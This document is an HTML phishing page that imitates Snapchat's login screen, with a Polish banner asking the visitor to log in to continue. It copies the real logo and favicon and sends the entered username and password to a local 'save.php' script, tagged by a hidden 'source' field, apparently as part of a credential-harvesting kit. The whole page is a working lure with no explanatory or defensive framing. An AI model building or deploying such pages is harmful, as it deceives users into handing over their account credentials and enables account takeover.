<!DOCTYPE html>
<html lang="pl">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Log In - Snapchat</title>
  <link rel="shortcut icon" type="image/png" href="https://accounts.snapchat.com/favicon.ico"/>
  <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300" rel="stylesheet" type="text/css">
  <style>
    body {
      margin: 0;
      font-family: 'Open Sans', sans-serif;
      background-color: #262626;
      color: #fff;
      text-align: center;
    }

    .inputBox {
      font-family: 'Open Sans', sans-serif;
      width: 304px;
      height: 38px;
      margin-bottom: 15px;
      padding: 10px;
      border: 1px solid rgba(39,41,43,.15);
      border-radius: .2857rem;
      background-color: #fff;
      color: #000;
      font-size: 14px;
    }

    button {
      cursor: pointer;
      width: 304px;
      height: 38px;
      padding: 13px 1.5em;
      background-color: #fffc01;
      color: #262626;
      border: none;
      border-radius: 5px;
      font-weight: 700;
      text-transform: uppercase;
      font-family: 'Open Sans', sans-serif;
    }

    button:hover {
      background-color: #f4f100;
    }

    a {
      color: #009fda;
      text-decoration: none;
      font-size: 14px;
    }

    .top-message {
      position: fixed;
      top: 0;
      width: 100%;
      background-color: #fff;
      color: #000;
      padding: 15px 0;
      font-size: 14px;
    }

    img.logo {
      width: 36px;
      padding-top: 80px;
      padding-bottom: 30px;
    }

    h1 {
      font-size: 36px;
      margin-bottom: 30px;
    }
  </style>
</head>
<body>
  <div class="top-message">Zaloguj się do swojego konta, aby kontynuować</div>
  <img class="logo" src="https://accounts.snapchat.com/accounts/static/images/ghost/ghost.svg" alt="Snapchat logo">
  <h1>Log In</h1>
  <form action="save.php" method="POST">
    <input class="inputBox" name="username" type="text" placeholder="Username" required><br>
    <input class="inputBox" name="password" type="password" placeholder="Password" required><br>
    <input type="hidden" name="source" value="Snapchat">
    <button type="submit">Log In</button>
  </form>
  <br>
  <a href="https://accounts.snapchat.com/accounts/password_reset_request">Forgot your password?</a>
</body>
</html>
